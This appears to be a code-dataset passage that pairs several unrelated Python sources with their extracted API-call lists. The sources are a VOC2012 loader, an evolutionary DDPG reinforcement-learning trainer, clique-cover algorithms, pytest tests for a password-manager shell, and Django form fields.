annotation_path = os.path.join(root_path, "Annotations")
image_path = os.path.join(root_path, "JPEGImages")
main_path = os.path.join(root_path, "ImageSets", "Main")
dataset = Dataset(DATASET_NAME)
dataset.load_catalog(os.path.join(os.path.dirname(__file__), "catalog.json"))
boolean_attributes = get_boolean_attributes(dataset.catalog.box2d)
for segment_name in _SEGMENT_NAMES:
segment = dataset.create_segment(segment_name)
with open(os.path.join(main_path, f"{segment_name}.txt"), encoding="utf-8") as fp:
for stem in fp:
segment.append(
get_voc_detection_data(
stem.rstrip(), image_path, annotation_path, boolean_attributes
)
)
return dataset
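
# Hedged usage sketch (not part of the original loader): "<path to VOC2012>"
# is a placeholder, and iterating segments assumes the tensorbay Dataset
# behaves as a sequence of Segment objects.
if __name__ == "__main__":
    voc = VOC2012Detection("<path to VOC2012>")
    for segment in voc:
        print(segment.name, len(segment))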
|
[
"os.path.expanduser",
"os.path.dirname",
"tensorbay.opendataset._utility.get_boolean_attributes",
"tensorbay.dataset.Dataset",
"os.path.join"
] |
[((1113, 1151), 'os.path.join', 'os.path.join', (['root_path', '"""Annotations"""'], {}), "(root_path, 'Annotations')\n", (1125, 1151), False, 'import os\n'), ((1169, 1206), 'os.path.join', 'os.path.join', (['root_path', '"""JPEGImages"""'], {}), "(root_path, 'JPEGImages')\n", (1181, 1206), False, 'import os\n'), ((1223, 1267), 'os.path.join', 'os.path.join', (['root_path', '"""ImageSets"""', '"""Main"""'], {}), "(root_path, 'ImageSets', 'Main')\n", (1235, 1267), False, 'import os\n'), ((1283, 1304), 'tensorbay.dataset.Dataset', 'Dataset', (['DATASET_NAME'], {}), '(DATASET_NAME)\n', (1290, 1304), False, 'from tensorbay.dataset import Dataset\n'), ((1412, 1457), 'tensorbay.opendataset._utility.get_boolean_attributes', 'get_boolean_attributes', (['dataset.catalog.box2d'], {}), '(dataset.catalog.box2d)\n', (1434, 1457), False, 'from tensorbay.opendataset._utility import get_boolean_attributes, get_voc_detection_data\n'), ((1065, 1089), 'os.path.expanduser', 'os.path.expanduser', (['path'], {}), '(path)\n', (1083, 1089), False, 'import os\n'), ((1343, 1368), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1358, 1368), False, 'import os\n'), ((1572, 1618), 'os.path.join', 'os.path.join', (['main_path', 'f"""{segment_name}.txt"""'], {}), "(main_path, f'{segment_name}.txt')\n", (1584, 1618), False, 'import os\n')]
|
from src.ddpg.train import Trainer
from src.ddpg.buffer import MemoryBuffer
from statistics import mean
import gym
import numpy as np
import random
import scipy.stats
class EvolutionaryDDPG:
def __init__(self, n_networks, max_buffer, max_episodes, max_steps, episodes_ready, explore_prob, explore_factors):
        self.n = n_networks  # number of networks
self.max_buffer = max_buffer
self.max_episodes = max_episodes
self.max_steps = max_steps
self.episodes_ready = episodes_ready
if len(self.episodes_ready) < n_networks:
print("episodes_ready.len() != n_networks")
raise Exception
self.explore_prob = explore_prob - int(explore_prob)
self.explore_factors = explore_factors
self.rams = []
        # initialize the last 10 partial scores of every network to -100
self.last_ten_scores = [[-100 for _ in range(10)] for _ in range(self.n)]
self.envs = self.create_envs()
self.ddpgs = self.create_ddpg()
def create_envs(self):
envs = []
for i in range(self.n):
env = gym.make('BipedalWalker-v2')
envs.append(env)
return envs
def create_ddpg(self):
ddpgs = []
for i in range(self.n):
env = self.envs[i]
s_dim = env.observation_space.shape[0]
a_dim = env.action_space.shape[0]
a_max = env.action_space.high[0]
print(' State Dimensions :- ', s_dim)
print(' Action Dimensions :- ', a_dim)
print(' Action Max :- ', a_max)
ram = MemoryBuffer(self.max_buffer)
self.rams.append(ram)
trainer = Trainer(s_dim, a_dim, a_max, ram)
ddpgs.append(trainer)
return ddpgs
def exploit(self, idx):
"""
        Exploitation uniformly samples another (randomly chosen) agent from the
        population and compares the last 10 partial rewards using Welch's t-test.
        If the sampled agent has a higher mean partial reward and passes the
        t-test, its weights and hyperparameters are copied into the current agent.
        :param idx: index of the network for which exploit() is called
"""
        # draw the index of a network different from the current one
random_idx = random.randrange(self.n)
while random_idx == idx:
random_idx = random.randrange(self.n)
        # pick the better network
best_net_idx = self.pick_net(idx, random_idx)
        # if the sampled network turned out to be better
if idx != best_net_idx:
            # copy over the weights
new_param = self.ddpgs[best_net_idx].actor.parameters()
for param in self.ddpgs[idx].actor.parameters():
param.data.copy_(next(new_param))
new_param = self.ddpgs[best_net_idx].critic.parameters()
for param in self.ddpgs[idx].critic.parameters():
param.data.copy_(next(new_param))
print("<exploit", idx, "> Wczytano nowe wagi z sieci nr ", best_net_idx)
else:
print("<exploit", idx, "> Wagi zostajฤ
, sฤ
lepsze od sieci nr ", random_idx)
def explore(self, idx):
if random.random() < 0.5:
for param in self.ddpgs[idx].actor.parameters():
param.data.mul_(self.explore_factors[0])
for param in self.ddpgs[idx].critic.parameters():
param.data.mul_(self.explore_factors[0])
print("<explore", idx, "> Przemnoลผono wagi przez ", self.explore_factors[0])
else:
for param in self.ddpgs[idx].actor.parameters():
param.data.mul_(self.explore_factors[1])
for param in self.ddpgs[idx].critic.parameters():
param.data.mul_(self.explore_factors[1])
print("<explore", idx, "> Przemnoลผono wagi przez ", self.explore_factors[1])
def pick_net(self, idx1, idx2):
"""
        Compare the partial rewards of two networks using Welch's t-test.
        :param idx1: the current network
        :param idx2: the randomly chosen network
        :return: index of the better network
"""
statistic, pvalue = scipy.stats.ttest_ind(self.last_ten_scores[idx1], self.last_ten_scores[idx2],
equal_var=False)
if pvalue <= 0.05:
            # passed Welch's t-test; now compare the means of the last 10 scores
if mean(self.last_ten_scores[idx1]) > mean(self.last_ten_scores[idx2]):
                return idx1  # current network is better
else:
                return idx2  # randomly chosen network is better
else:
            return idx1  # did not pass Welch's t-test
def train(self):
        # Number of algorithm iterations
for episode in range(self.max_episodes):
            # For each network
for ddpg_idx in range(self.n):
trainer = self.ddpgs[ddpg_idx]
ram = self.rams[ddpg_idx]
env = self.envs[ddpg_idx]
                # Reset the environment
observation = env.reset()
                # Track the total score obtained
total_reward = 0
                # Run at most max_steps steps
for r in range(self.max_steps):
# env.render()
state = np.float32(observation)
action = trainer.get_exploration_action(state)
new_observation, reward, done, info = env.step(action)
total_reward = total_reward + reward
if not done:
new_state = np.float32(new_observation)
ram.add(state, action, reward, new_state)
observation = new_observation
trainer.optimize()
if done:
break
self.append_score(ddpg_idx, total_reward)
print('NETWORK ', ddpg_idx, ' EPISODE : ', episode, ' SCORE : ', total_reward)
                # each network has its own episode interval, after which exploit and explore are invoked
if episode % self.episodes_ready[ddpg_idx] == 0 and episode != 0:
self.exploit(ddpg_idx)
if random.random() < self.explore_prob:
self.explore(ddpg_idx)
if episode % 100 == 0:
self.save_ckpt(episode)
def append_score(self, idx, new_score):
"""
        Drop the oldest of the last 10 partial scores and append the new one.
        :param idx: network index
        :param new_score: the new score
"""
self.last_ten_scores[idx] = self.last_ten_scores[idx][1:]
self.last_ten_scores[idx].append(new_score)
def save_ckpt(self, episode):
idx_ddpg = 0
for ddpg in self.ddpgs:
ddpg.save_models_path(idx_ddpg, episode)
idx_ddpg = idx_ddpg + 1
print('Models saved successfully')
def load_ckpt(self, episode):
idx_ddpg = 0
for ddpg in self.ddpgs:
ddpg.load_models_path('Models/' + str(idx_ddpg) + '_' + str(episode) + '_actor.pt',
'Models/' + str(idx_ddpg) + '_' + str(episode) + '_critic.pt')
idx_ddpg = idx_ddpg + 1
print('Models loaded successfully')
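
# Hedged usage sketch (not part of the original file): a small population with
# illustrative hyperparameters; episodes_ready gives each network its own
# exploit/explore interval.
if __name__ == '__main__':
    pbt = EvolutionaryDDPG(n_networks=3, max_buffer=1000000,
                           max_episodes=1000, max_steps=1600,
                           episodes_ready=[10, 12, 14],
                           explore_prob=0.8, explore_factors=[1.02, 0.98])
    pbt.train()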
|
[
"gym.make",
"src.ddpg.buffer.MemoryBuffer",
"numpy.float32",
"random.random",
"random.randrange",
"statistics.mean",
"src.ddpg.train.Trainer"
] |
[((2347, 2371), 'random.randrange', 'random.randrange', (['self.n'], {}), '(self.n)\n', (2363, 2371), False, 'import random\n'), ((1135, 1163), 'gym.make', 'gym.make', (['"""BipedalWalker-v2"""'], {}), "('BipedalWalker-v2')\n", (1143, 1163), False, 'import gym\n'), ((1630, 1659), 'src.ddpg.buffer.MemoryBuffer', 'MemoryBuffer', (['self.max_buffer'], {}), '(self.max_buffer)\n', (1642, 1659), False, 'from src.ddpg.buffer import MemoryBuffer\n'), ((1716, 1749), 'src.ddpg.train.Trainer', 'Trainer', (['s_dim', 'a_dim', 'a_max', 'ram'], {}), '(s_dim, a_dim, a_max, ram)\n', (1723, 1749), False, 'from src.ddpg.train import Trainer\n'), ((2430, 2454), 'random.randrange', 'random.randrange', (['self.n'], {}), '(self.n)\n', (2446, 2454), False, 'import random\n'), ((3252, 3267), 'random.random', 'random.random', ([], {}), '()\n', (3265, 3267), False, 'import random\n'), ((4499, 4531), 'statistics.mean', 'mean', (['self.last_ten_scores[idx1]'], {}), '(self.last_ten_scores[idx1])\n', (4503, 4531), False, 'from statistics import mean\n'), ((4534, 4566), 'statistics.mean', 'mean', (['self.last_ten_scores[idx2]'], {}), '(self.last_ten_scores[idx2])\n', (4538, 4566), False, 'from statistics import mean\n'), ((5398, 5421), 'numpy.float32', 'np.float32', (['observation'], {}), '(observation)\n', (5408, 5421), True, 'import numpy as np\n'), ((5692, 5719), 'numpy.float32', 'np.float32', (['new_observation'], {}), '(new_observation)\n', (5702, 5719), True, 'import numpy as np\n'), ((6343, 6358), 'random.random', 'random.random', ([], {}), '()\n', (6356, 6358), False, 'import random\n')]
|
from collections import defaultdict
import numpy as np
import networkx as nx
import networkx.algorithms.approximation as approx
import networkx.algorithms.coloring as coloring
import pulp
def clique_random_sequential(graph : nx.Graph) -> list:
"""Perform minimum clique cover with random sequential greedy method
This method will create clique greedily. At least finish with O(|V|^2).
Args:
graph (nx.Graph): graph to solve
Returns:
list: list of node names for each clique
"""
graph = graph.copy()
clique_list = []
while len(graph.nodes())>0:
clique = []
node_list = list(graph.nodes())
        node_list = list(np.random.permutation(node_list))  # permutation is not in-place; keep the shuffled order
for node in node_list:
flag = True
for exist_node in clique:
if node not in graph[exist_node]:
flag =False
break
if flag:
clique.append(node)
graph.remove_nodes_from(clique)
clique_list.append(clique)
return clique_list
def clique_approx_find_greedy_eliminate(graph: nx.Graph) -> list:
"""Perform minimum clique cover by approximatly find maximum clique and iteratively eliminate it.
Find the maximum clique with approximatino methods and iteratively eliminate it.
Args:
graph (nx.Graph): graph to solve
Returns:
list: list of node names for each clique
"""
_, clique_list = approx.clique_removal(graph)
clique_list = [list(item) for item in clique_list]
return clique_list
def clique_exact_find_greedy_eliminate(graph: nx.Graph) -> list:
"""Perform minimum clique cover by exactly find maximum clique and iteratively eliminate it.
Find the maximum clique by enumerating all the cliques and iteratively eliminate it.
Args:
graph (nx.Graph): graph to solve
Returns:
list: list of node names for each clique
"""
graph = graph.copy()
clique_list = []
while len(graph.nodes())>0:
max_size = 0
max_clique = []
for clique in nx.find_cliques(graph):
size = len(clique)
if size > max_size:
max_size = size
max_clique = clique
graph.remove_nodes_from(max_clique)
clique_list.append(max_clique)
return clique_list
def clique_exact_find_once_greedy_eliminate(graph: nx.Graph) -> list:
"""Perform minimum clique cover by exactly find maximum clique and iteratively eliminate it.
Find the maximum clique by enumerating all the cliques once and iteratively eliminate it.
Args:
graph (nx.Graph): graph to solve
Returns:
list: list of node names for each clique
"""
max_cliques = sorted(nx.find_cliques(graph), key=lambda x: len(x), reverse=True)
max_cliques = [set(i) for i in max_cliques]
clique_list = []
while np.sum([len(i) for i in max_cliques]) > 0:
max_clique = max_cliques[0]
max_cliques = [i - max_clique for i in max_cliques]
max_cliques = sorted(max_cliques, key=lambda x: len(x), reverse=True)
clique_list.append(max_clique)
return clique_list
def coloring_greedy(graph: nx.Graph, strategy: str) -> list:
"""Perform minimum clique cover by reducing problem into coloring problem and using approximation methods.
See https://networkx.github.io/documentation/stable/reference/algorithms/coloring.html
for detailed algorithms
Args:
graph (nx.Graph): graph to solve
strategy (str): name of strategy
Returns:
list: list of node names for each clique
"""
graph = nx.complement(graph)
result = coloring.greedy_color(graph, strategy=strategy)
clique_dict = defaultdict(list)
for node,color in result.items():
clique_dict[color].append(node)
return list(clique_dict.values())
class AbortedError(Exception):
pass
def integer_programming(graph: nx.Graph) -> list:
"""Perform minimum clique cover by reducing problem into integer programming.
If solver says optimal, optimal solution for minimum clique cover is obtained,
but it may take very long time for large problems.
TODO: Check installation of commercial IP solvers such as CPLEX, Gurobi, and
use them if they are installed.
Args:
graph (nx.Graph): graph to solve
Returns:
list: list of node names for each clique
Raises:
Exception: Solver cannot solve IP problem.
"""
problem = pulp.LpProblem("clique_cover", pulp.LpMinimize)
clique_max_count = len(graph.nodes())
clique_vars = []
for ind in range(clique_max_count):
var = pulp.LpVariable("clique{}".format(ind), cat="Binary")
clique_vars.append(var)
node_belong_vars = []
for ind in range(clique_max_count):
node_belong_vars.append({})
for node in graph.nodes():
nodename = str(node)
nodename = nodename.replace(" ","0").replace(" i","1").replace(" -","2").replace("-i","3")
var = pulp.LpVariable("{}_{}".format(nodename,ind), cat = "Binary")
node_belong_vars[ind][node] = var
# minimize used cliques
problem += sum(clique_vars)
# if node belongs, clique must be used
for ind in range(clique_max_count):
for node in graph.nodes():
problem += (node_belong_vars[ind][node] <= clique_vars[ind])
# clique must be exclusive
for node in graph.nodes():
items = []
for ind in range(clique_max_count):
items.append(node_belong_vars[ind][node])
problem += (sum(items)==1)
# not-neighboring nodes cannot belong the same clique
for ind in range(clique_max_count):
for i1, n1 in enumerate(graph.nodes()):
for i2, n2 in enumerate(graph.nodes()):
if i2<=i1: continue
if n2 not in graph[n1]:
problem += (node_belong_vars[ind][n1]+node_belong_vars[ind][n2]<=1)
#status = problem.solve()
import multiprocessing
cpu_count = multiprocessing.cpu_count()
status = problem.solve(pulp.PULP_CBC_CMD(threads=cpu_count, keepFiles=0, mip=1, maxSeconds=5))
#status = problem.solve(pulp.PULP_CBC_CMD(maxSeconds=5, msg=0, fracGap=0))
#print(problem)
#print(pulp.LpStatus[status])
#print(problem.objective.value())
# cannot solve
if status <= 0:
raise AbortedError("Solver cannot solve problem.")
clique_dict = defaultdict(list)
node_count = 0
for node in graph.nodes():
for index in range(clique_max_count):
var = node_belong_vars[index][node]
if(var.value()>=0.5):
clique_dict[index].append(node)
node_count += 1
break
return list(clique_dict.values())
strategy_func = {
"clique_random_sequential" : clique_random_sequential,
"clique_approx_find_greedy_eliminate" : clique_approx_find_greedy_eliminate,
"clique_exact_find_greedy_eliminate" : clique_exact_find_greedy_eliminate,
"clique_exact_find_once_greedy_eliminate" : clique_exact_find_once_greedy_eliminate,
"coloring_largest_first" : None,
"coloring_smallest_last" : None,
"coloring_random_sequential" : None,
"coloring_independent_set" : None,
"coloring_connected_sequential_bfs" : None,
"coloring_connected_sequential_dfs" : None,
"coloring_saturation_largest_first" : None,
"integer_programming" : integer_programming,
}
clique_cover_strategies = strategy_func.keys()
def clique_cover(graph: nx.Graph, strategy: str = "clique_random_sequential") -> list:
"""Perform minimum clique cover using several strategies
Args:
graph (nx.Graph): graph to solve
strategy (str): name of strategy
Returns:
list: list of node names for each clique
"""
if strategy not in strategy_func:
raise ValueError("Unknown strategy, choose from {}".format(strategy_func.keys()))
coloring_prefix = "coloring_"
if coloring_prefix in strategy:
return coloring_greedy(graph, strategy = strategy[len(coloring_prefix):])
return strategy_func[strategy](graph)
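
# Hedged usage sketch (not part of the original module): cover a small graph;
# the triangle {0, 1, 2} plus the pendant edge (2, 3) admits a two-clique cover.
if __name__ == "__main__":
    g = nx.Graph([(0, 1), (1, 2), (0, 2), (2, 3)])
    print(clique_cover(g, strategy="clique_random_sequential"))
    print(clique_cover(g, strategy="coloring_largest_first"))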
|
[
"networkx.algorithms.coloring.greedy_color",
"networkx.complement",
"collections.defaultdict",
"networkx.find_cliques",
"numpy.random.permutation",
"pulp.LpProblem",
"pulp.PULP_CBC_CMD",
"networkx.algorithms.approximation.clique_removal",
"multiprocessing.cpu_count"
] |
[((1497, 1525), 'networkx.algorithms.approximation.clique_removal', 'approx.clique_removal', (['graph'], {}), '(graph)\n', (1518, 1525), True, 'import networkx.algorithms.approximation as approx\n'), ((3741, 3761), 'networkx.complement', 'nx.complement', (['graph'], {}), '(graph)\n', (3754, 3761), True, 'import networkx as nx\n'), ((3776, 3823), 'networkx.algorithms.coloring.greedy_color', 'coloring.greedy_color', (['graph'], {'strategy': 'strategy'}), '(graph, strategy=strategy)\n', (3797, 3823), True, 'import networkx.algorithms.coloring as coloring\n'), ((3843, 3860), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (3854, 3860), False, 'from collections import defaultdict\n'), ((4632, 4679), 'pulp.LpProblem', 'pulp.LpProblem', (['"""clique_cover"""', 'pulp.LpMinimize'], {}), "('clique_cover', pulp.LpMinimize)\n", (4646, 4679), False, 'import pulp\n'), ((6243, 6270), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (6268, 6270), False, 'import multiprocessing\n'), ((6670, 6687), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (6681, 6687), False, 'from collections import defaultdict\n'), ((687, 719), 'numpy.random.permutation', 'np.random.permutation', (['node_list'], {}), '(node_list)\n', (708, 719), True, 'import numpy as np\n'), ((2143, 2165), 'networkx.find_cliques', 'nx.find_cliques', (['graph'], {}), '(graph)\n', (2158, 2165), True, 'import networkx as nx\n'), ((2833, 2855), 'networkx.find_cliques', 'nx.find_cliques', (['graph'], {}), '(graph)\n', (2848, 2855), True, 'import networkx as nx\n'), ((6299, 6369), 'pulp.PULP_CBC_CMD', 'pulp.PULP_CBC_CMD', ([], {'threads': 'cpu_count', 'keepFiles': '(0)', 'mip': '(1)', 'maxSeconds': '(5)'}), '(threads=cpu_count, keepFiles=0, mip=1, maxSeconds=5)\n', (6316, 6369), False, 'import pulp\n')]
|
import shutil
import time
from pathlib import Path
from threading import Event
import pytest
from keybox.main import main as keybox_main
from keybox.ui import BaseUI
from keybox.shell import ShellUI, BaseInput
from .expect import Expect, ExpectCopy, Send, DelayedSend
config_filename = 'test_keybox.conf'
safe_filename = 'test_keybox.safe'
passphrase = '<PASSWORD>'
dummy_filename = Path(__file__).parent / "dummy_keybox.safe"
dummy_passphrase = "<PASSWORD>"
@pytest.fixture()
def config_file(tmp_path):
return tmp_path / config_filename
@pytest.fixture()
def safe_file(tmp_path):
return tmp_path / safe_filename
@pytest.fixture()
def prepare_script(monkeypatch, capfd):
script = []
timeouted = Event()
def check_captured():
captured = capfd.readouterr()
assert captured.err == ''
out = captured.out
while out:
cmd = script.pop(0)
out = cmd.expect(out)
def expect_copy(_self, text):
check_captured()
cmd = script.pop(0)
cmd.expect_copy(str(text))
def feed_input(_self, prompt):
check_captured()
script.pop(0).expect(prompt)
feed = script.pop(0).send()
if timeouted.is_set():
raise TimeoutError
return feed
def raise_timeout(*_args, **_kwargs):
timeouted.set()
def dummy(*_args, **_kwargs):
pass
monkeypatch.setattr(ShellUI, '_input', feed_input, raising=True)
monkeypatch.setattr(BaseUI, '_input', feed_input, raising=True)
monkeypatch.setattr(BaseUI, '_input_pass', feed_input, raising=True)
monkeypatch.setattr(BaseUI, '_copy', expect_copy, raising=True)
monkeypatch.setattr(BaseInput, '__init__', dummy, raising=True)
monkeypatch.setattr(BaseInput, 'input', feed_input, raising=True)
monkeypatch.setattr(BaseInput, 'cancel', raise_timeout, raising=True)
def prepare(*script_items):
script.extend(script_items)
yield prepare
check_captured()
assert len(script) == 0
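
# Hedged note (not part of the original tests): the fixture yields `prepare`,
# which queues Expect/Send steps; every prompt printed by the program under
# test must be matched by an Expect before the following Send supplies input,
# e.g. prepare_script(Expect("Passphrase: "), Send("secret")).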
def test_shell(prepare_script, config_file, safe_file):
assert not safe_file.exists()
temp_pass = '<PASSWORD>'
prepare_script(
# Initialize
Expect(f"Loading config {str(config_file)!r}...\n"),
Expect(f"Opening file {str(safe_file)!r}... "),
Expect(f"Not found.\n"),
Expect("Create new keybox file? [Y/n] "),
Send("y"),
Expect("Enter new passphrase: "),
Send(temp_pass),
Expect("Re-enter new passphrase: "),
Send(temp_pass),
# Shell completer
Expect("> "),
Send("m p blah"),
Expect("No record selected. See `help select`.\n"),
# Add command
Expect("> "),
Send("add"),
Expect("User: "),
Send("jackinthebox"),
Expect("Password: "),
Send("pw123"),
Expect("Site: "),
Send("Example"),
Expect("URL: "),
Send("http://example.com/"),
Expect("Tags: "),
Send("web test"),
Expect("Note: "),
Send(""),
# List
Expect("> "),
Send("l"),
Expect("Example jackinthebox http://example.com/ web test "
"%s \\d{2}:\\d{2}:\\d{2} \n" % time.strftime("%F"),
regex=True),
# Count
Expect("> "),
Send("count"),
Expect("1\n"),
# Write
Expect("> "),
Send("w"),
Expect(f"Changes saved to file {str(safe_file)!r}.\n"),
# Select
Expect("> "),
Send("s"),
Expect("Example jackinthebox http://example.com/ web test "
"%s \\d{2}:\\d{2}:\\d{2} \n" % time.strftime("%F"),
regex=True),
# Print
Expect("> "),
Send("p"),
Expect("pw123\n"),
# Select with args
Expect("> "),
Send("select nonexisting"),
Expect("Not found.\n"),
Expect("> "),
Send("select example"),
Expect("Example jackinthebox http://example.com/ web test "
"%s \\d{2}:\\d{2}:\\d{2} \n" % time.strftime("%F"),
regex=True),
# Reset
Expect("> "),
Send("reset"),
Expect("Enter current passphrase: "),
Send(temp_pass),
Expect("Enter new passphrase: "),
Send(passphrase),
Expect("Re-enter new passphrase: "),
Send(passphrase),
# Is the password still okay after re-encryption?
Expect("> "),
Send("p"),
Expect("pw123\n"),
# Check
Expect("> "),
Send("ch"),
# Delete
Expect("> "),
Send("d"),
Expect("Delete selected record? This cannot be taken back! [y/n] "),
Send("y"),
Expect("Record deleted.\n"),
# Finish
Expect("> "),
Send("quit"),
Expect(f"Changes saved to file {str(safe_file)!r}.\n"),
)
keybox_main(["shell", "-c", str(config_file), "-f", str(safe_file),
'--timeout', '10'])
def test_timeout(prepare_script, config_file, safe_file):
shutil.copyfile(dummy_filename, safe_file)
prepare_script(
# Initialize
Expect(f"Loading config {str(config_file)!r}...\n"),
Expect(f"Opening file {str(safe_file)!r}... "),
Expect("\n"),
Expect("Passphrase: "),
Send(dummy_passphrase),
# Finish
Expect("> "),
DelayedSend(1.1, "too late"),
Expect("Timeout after 1 seconds.\n"),
)
keybox_main(["shell", "-c", str(config_file), "-f", str(safe_file),
'--timeout', '1'])
def test_readonly(prepare_script, config_file, safe_file):
shutil.copyfile(dummy_filename, safe_file)
prepare_script(
# Initialize
Expect(f"Loading config {str(config_file)!r}...\n"),
Expect(f"Opening file {str(safe_file)!r}... \n"),
Expect("Passphrase: "),
Send(dummy_passphrase),
# Check read-only mode
Expect("Open in read-only mode.\n"),
Expect("> "),
Send("reset"),
Expect("Read-only mode.\n"),
Expect("> "),
Send("q"),
)
keybox_main(["shell", "-c", str(config_file), "-f", str(safe_file),
'--read-only', '--timeout', '1'])
def test_print(prepare_script, config_file, safe_file):
shutil.copyfile(dummy_filename, safe_file)
filter_expr = 'test'
prepare_script(
# Initialize
Expect(f"Loading config {str(config_file)!r}...\n"),
Expect(f"Opening file {str(safe_file)!r}... \n"),
Expect("Passphrase: "),
Send(dummy_passphrase),
# Check read-only mode
Expect("Open in read-only mode.\n"),
Expect(f"Searching for '{filter_expr}'...\n"),
Expect("test test http://test.test test 2021-11-06 20:23:59 test! \n"),
Expect('test\n'), # this is the password
)
keybox_main(["print", filter_expr, "-c", str(config_file), "-f", str(safe_file)])
def test_copy(prepare_script, config_file, safe_file):
shutil.copyfile(dummy_filename, safe_file)
filter_expr = 'test'
prepare_script(
# Initialize
Expect(f"Loading config {str(config_file)!r}...\n"),
Expect(f"Opening file {str(safe_file)!r}... \n"),
Expect("Passphrase: "),
Send(dummy_passphrase),
# Check read-only mode
Expect("Open in read-only mode.\n"),
Expect(f"Searching for '{filter_expr}'...\n"),
Expect("test test http://test.test test 2021-11-06 20:23:59 test! \n"),
ExpectCopy('test'), # this is the password
)
keybox_main(["copy", filter_expr, "-c", str(config_file), "-f", str(safe_file)])
def test_pwgen(prepare_script, config_file, safe_file):
shutil.copyfile(dummy_filename, safe_file)
prepare_script(
Expect(10 * "(\\S{20}) (\\S{20,100})\n", regex=True),
)
keybox_main(["pwgen", "-l", "20", "-u", "1", "-d", "1", "-s", "1"])
|
[
"pytest.fixture",
"time.strftime",
"pathlib.Path",
"threading.Event",
"keybox.main.main",
"shutil.copyfile"
] |
[((467, 483), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (481, 483), False, 'import pytest\n'), ((552, 568), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (566, 568), False, 'import pytest\n'), ((633, 649), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (647, 649), False, 'import pytest\n'), ((723, 730), 'threading.Event', 'Event', ([], {}), '()\n', (728, 730), False, 'from threading import Event\n'), ((5115, 5157), 'shutil.copyfile', 'shutil.copyfile', (['dummy_filename', 'safe_file'], {}), '(dummy_filename, safe_file)\n', (5130, 5157), False, 'import shutil\n'), ((5704, 5746), 'shutil.copyfile', 'shutil.copyfile', (['dummy_filename', 'safe_file'], {}), '(dummy_filename, safe_file)\n', (5719, 5746), False, 'import shutil\n'), ((6361, 6403), 'shutil.copyfile', 'shutil.copyfile', (['dummy_filename', 'safe_file'], {}), '(dummy_filename, safe_file)\n', (6376, 6403), False, 'import shutil\n'), ((7073, 7115), 'shutil.copyfile', 'shutil.copyfile', (['dummy_filename', 'safe_file'], {}), '(dummy_filename, safe_file)\n', (7088, 7115), False, 'import shutil\n'), ((7787, 7829), 'shutil.copyfile', 'shutil.copyfile', (['dummy_filename', 'safe_file'], {}), '(dummy_filename, safe_file)\n', (7802, 7829), False, 'import shutil\n'), ((7924, 7991), 'keybox.main.main', 'keybox_main', (["['pwgen', '-l', '20', '-u', '1', '-d', '1', '-s', '1']"], {}), "(['pwgen', '-l', '20', '-u', '1', '-d', '1', '-s', '1'])\n", (7935, 7991), True, 'from keybox.main import main as keybox_main\n'), ((388, 402), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (392, 402), False, 'from pathlib import Path\n'), ((3258, 3277), 'time.strftime', 'time.strftime', (['"""%F"""'], {}), "('%F')\n", (3271, 3277), False, 'import time\n'), ((3691, 3710), 'time.strftime', 'time.strftime', (['"""%F"""'], {}), "('%F')\n", (3704, 3710), False, 'import time\n'), ((4116, 4135), 'time.strftime', 'time.strftime', (['"""%F"""'], {}), "('%F')\n", (4129, 4135), False, 'import time\n')]
|
import re
import warnings
import mimetypes
from functools import total_ordering
from django.utils.encoding import force_text
from django.utils import six
import os
from django.utils.six.moves.urllib.request import build_opener
from django.utils.six.moves.urllib.parse import urlparse
from django import forms
from django.core.validators import URLValidator
from django.core.files.uploadedfile import SimpleUploadedFile
from ginger import ui, utils, paginator
from ginger.utils import feet_inches_to_cm, cm_to_feet_inches
from .widgets import EmptyWidget
__all__ = ["FileOrUrlInput", "HeightField", "HeightWidget", "SortField", "GingerDataSetField", "GingerSortField",
"GingerPageField"]
@total_ordering
class _SortableNone(object):
def __ge__(self, other):
return False
def __le__(self, other):
return True
def __eq__(self, other):
return self is other
SortableNone = _SortableNone()
class FileOrUrlInput(forms.ClearableFileInput):
def download_url(self, name, url):
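        # Validate the URL, download its contents, and wrap the body in a
        # SimpleUploadedFile so the rest of the form treats it as an upload.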
validate = URLValidator()
        validate(url)  # propagates forms.ValidationError for an invalid URL
parsed_url = urlparse(url)
path = parsed_url[2].strip("/")
name = os.path.basename(path)
        opener = build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
ze_file = opener.open(url).read()
        file_obj = SimpleUploadedFile(name=name, content=ze_file, content_type=mimetypes.guess_type(name)[0])  # guess_type returns a (type, encoding) tuple
file_obj.url = url
return file_obj
def value_from_datadict(self, data, files, name):
if name in data and name not in files:
url = forms.HiddenInput().value_from_datadict(data, files, name)
result = self.download_url(name, url) if url and isinstance(url, six.string_types) else None
files = files.copy() if files else {}
files[name] = result
return super(FileOrUrlInput, self).value_from_datadict(data, files, name)
class HeightWidget(forms.MultiWidget):
def __init__(self, *args, **kwargs):
widgets = [forms.TextInput(attrs={'placeholder': '5', 'size': '3'}), forms.TextInput(attrs={'placeholder': '6',
'size': '3'})]
super(HeightWidget,self).__init__(widgets, *args, **kwargs)
def decompress(self, value):
if value:
result = cm_to_feet_inches(value)
return result
else:
return [None,None]
def format_output(self, rendered_widgets):
return "%s ft %s inches" % tuple(rendered_widgets)
class HeightField(forms.MultiValueField):
widget = HeightWidget
def __init__(self, *args, **kwargs):
kwargs.pop('min_value',None)
errors = self.default_error_messages.copy()
if 'error_messages' in kwargs:
errors.update(kwargs['error_messages'])
reqd = kwargs.setdefault('required', False)
fields = (
forms.IntegerField(min_value=0,required=reqd),
forms.IntegerField(min_value=0,required=reqd),
)
super(HeightField, self).__init__(fields, *args, **kwargs)
def compress(self, data_list):
if data_list and all(d is not None for d in data_list):
feet, inches = data_list
return feet_inches_to_cm(feet, inches)
return None
class GingerSortField(forms.ChoiceField):
def __init__(self, choices=(), toggle=True, **kwargs):
kwargs.setdefault("required", False)
kwargs.setdefault("widget", forms.HiddenInput)
super(GingerSortField, self).__init__(choices=choices, **kwargs)
self.toggle = toggle
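        # Expose stable positional keys ("0", "1", ...) as the public choice values,
        # mapping each back to its real ORM ordering expression in field_map.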
field_map = {}
new_choices = []
for i, (value, label) in enumerate(choices):
position = str(i)
new_choices.append((position, label))
field_map[position] = re.sub(r'\s+', ' ', value.strip())
self.choices = tuple(new_choices)
self.field_map = field_map
def valid_value(self, value):
